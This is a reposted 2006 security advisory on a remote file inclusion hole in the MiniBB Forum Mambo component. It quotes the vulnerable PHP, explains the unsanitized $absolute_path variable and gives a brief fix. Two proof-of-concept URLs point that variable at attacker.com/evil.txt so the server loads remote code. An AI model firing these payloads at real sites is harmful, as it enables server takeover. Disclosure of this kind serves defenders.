|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 846 Credit : Ahmad Maulana a.k.a Matdhule Date : 18.07.2006 Exploit Code : --------------------------------------------------------------------------- ------------------ MiniBB Forum Mambo Component <= 1.5a Remote File Include Vulnerabilities --------------------------------------------------------------------------- -------------------- Author : Ahmad Maulana a.k.a Matdhule Date : July 14th 2006 Location : Indonesia, Jakarta Web : http://advisories.echo.or.id/adv/adv39-matdhule-2006.txt http://www.securityfocus.com/bid/18998 Critical Lvl : Highly critical Impact : System access Where : From Remote ------------------------------------------------------------------------ Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # MiniBB Forum Application : MiniBB Forum (com_minibb.php & index.php) version : 1.5a ------------------------------------------------------------------------ Vulnerability: ~~~~~~~~~~~~~~~ # MiniBB Forum In folder components we found vulnerability script com_minibb.php. -----------------------com_minibb.php----------------------------------- ................... If ($current=="bb_admin"){ include("$absolute_path/components/minibb/bb_admin.php"); } else { include("$absolute_path/components/minibb/index.php"); ................... ------------------------------------------------------------------------ In folder minibb we found vulnerability script index.php. -----------------------index.php---------------------------------------- .............................. define ('INCLUDED776',1); include ($absolute_path.'/components/minibb/setup_options.php'); if (isset($HTTP_COOKIE_VARS[$cookiename.'Language']) and $langCook=${$cookiename.'Language'}) { if (file_exists("$absolute_path/components/minibb/lang/{$langCook}.php")) $lang=$langCook; } include ($absolute_path.'/components/minibb/setup_'.$DB.'.php'); .............................. Variables $absolute_path are not properly sanitized. When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script. Proof Of Concept: ~~~~~~~~~~~~~~~~ http://[target]/[path]/components/com_minibb.php?absolute_path=http://attac ker.com/evil.txt? http://[target]/[path]/components/minibb/index.php?absolute_path= http://attacker.com/evil.txt? Solution: ~~~~~~~~ sanitize variabel $absolute_path. ------------------------------------------------------------------------ --- Shoutz: ~~~~~~ ~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :) ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous ~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama ~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com ~ #mardongan #jambihackerlink #e-c-h-o @ irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~~~~~ matdhule[at]gmail[dot]com -------------------------------- [ EOF ]----------------------------------  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |